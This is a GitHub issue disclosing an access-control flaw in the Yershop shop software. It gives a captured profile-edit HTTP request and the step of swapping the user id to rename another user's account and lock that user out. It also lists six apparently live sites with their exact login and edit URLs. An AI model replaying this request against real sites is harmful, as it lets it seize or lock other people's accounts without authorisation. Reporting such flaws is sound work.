Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Beyond authority loophole in Yershop #1

Open
lu0r3n opened this issue May 21, 2020 · 0 comments
Open

Beyond authority loophole in Yershop #1

lu0r3n opened this issue May 21, 2020 · 0 comments

Comments

@lu0r3n
Copy link

lu0r3n commented May 21, 2020

Yershop mall has a horizontal ultra vires vulnerability, which can be used to maliciously change any user name for the full version of the vulnerability, resulting in the user unable to log in the account.

The account passwords of the following cases are all below

Account 1: lu0r3n

Password: lu0r3n

Account 2: lu0r3n1

Password: lu0r3n

Case 1: http://39.105.34.27/projects/index.php/index/index/index.html

Landing place: http://39.105.34.27/projects/index.php/index/user/login.html

Personal data change office: http://39.105.34.27/projects/index.php/index/user/edit.html
image

Use burp to cut package when saving

Packet:

POST /projects/ index.php/index/user/edit .html HTTP/1.1

Host: 39.105.34.27

Content-Length: 66

Accept: application/json, text/javascript, /; q=0.01

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http://39.105.34.27

Referer: http://39.105.34.27/projects/index.php/index/user/edit.html

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: j1eU_ 2132_ saltkey=nj6wEe8s; j1eU_ 2132_ lastvisit=1588948355; j1eU_ 2132_ sid=UQR48r; PHPSESSID=174ae4d03e7fb8e838248372b01e3c3f; j1eU_ 2132_ lastact=1588952051%09 index.php%09

Connection: close

cover_ id=1&username=lu0r3n&sex=%E4%BF%9D%E5%AF%86&birthday=&id=382

Change id = 382 to id = 381 (because the ID of account 2 is 381, change the user name of account 2 here), change username = lu0r3n to hack, and then put the package

image

Come to the login place again, try to log in with the previous account password, but the user does not exist

image

Change lu0r3n1 to hack to log in and prove that the vulnerability exists

Uploading image.png…

Case 2: http://www.sqdd.xyz/index.php/index/index/index.html

Landing place: http://www.sqdd.xyz/index.php/index/user/login.html

Personal information change: http://www.sqdd.xyz/index.php/index/user/edit.html

Case 3: http://www.cyawl.com/index.php/index/index/index.html

Landing place: http://www.cyawl.com/index.php/index/user/login.html

Personal information change: http://www.cyawl.com/index.php/index/member/edit.html

Case 4: http://www.dp378.cn/index.php/index/index/index.html

Landing place: http://www.dp378.cn/index.php/index/user/login.html

Personal information change: http://www.dp378.cn/index.php/index/member/edit.html

Case 5: https://demo.yershop.com/index.php/index/index/index.html

Landing place: https://demo.yershop.com/index.php/index/user/login.html

Personal information change: https://demo.yershop.com/index.php/index/user/edit.html

Case 6: http://www.girltoo.com/

Landing place: http://www.girltoo.com/index.php?s=/Home/User/login.html

Personal information change: http://www.girltoo.com/index.php?s=/Home/center/information.html

@lu0r3n lu0r3n changed the title Yershop商城存在越权通杀漏洞 Beyond authority loophole in Yershop May 21, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant